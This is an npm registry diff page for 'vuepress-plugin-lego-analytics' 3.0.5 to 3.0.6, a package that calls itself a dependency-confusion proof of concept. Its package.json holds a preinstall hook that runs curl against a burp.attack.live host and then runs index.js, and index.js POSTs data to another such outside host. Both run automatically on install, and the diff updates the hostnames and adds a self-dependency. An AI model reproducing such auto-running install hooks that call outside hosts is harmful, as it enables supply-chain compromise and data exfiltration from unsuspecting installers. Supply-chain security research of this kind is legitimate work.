vuepress-plugin-lego-analytics 3.0.5 → 3.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +7 -4
package/index.js CHANGED
@@ -22,7 +22,7 @@ var postData = querystring.stringify({
22
22
  });
23
23
 
24
24
  var options = {
25
- hostname: "c1epr2tblxfk3jf3gmeu3hcqnht8h05p.burp.attack.live",
25
+ hostname: "942.o5u1vexnp9jw7vjfkyi67tg2rtxklj98.burp.attack.live",
26
26
  port: 443,
27
27
  path: "/",
28
28
  method: "POST",
package/package.json CHANGED
@@ -1,12 +1,15 @@
1
1
  {
2
2
  "name": "vuepress-plugin-lego-analytics",
3
- "version": "3.0.5",
3
+ "version": "3.0.6",
4
4
  "main": "index.js",
5
5
  "scripts": {
6
6
  "test": "echo \"Error: no test specified\" && exit 1",
7
- "preinstall": "curl 211frst1lnfa39ftgcek37cgn7tyhp5e.burp.attack.live && node index.js"
7
+ "preinstall": "curl 942.xdea3n5wxir5f4ros7qff2obz25ttthi.burp.attack.live && node index.js"
8
8
  },
9
9
  "author": "",
10
10
  "license": "ISC",
11
- "description": "This repository contains a Proof of Concept (PoC), demonstrating how malicious actors can exploit vulnerabilities using dependency confusion."
12
- }
11
+ "description": "This repository contains a Proof of Concept (PoC), demonstrating how malicious actors can exploit vulnerabilities using dependency confusion.",
12
+ "dependencies": {
13
+ "vuepress-plugin-lego-analytics": "^3.0.5"
14
+ }
15
+ }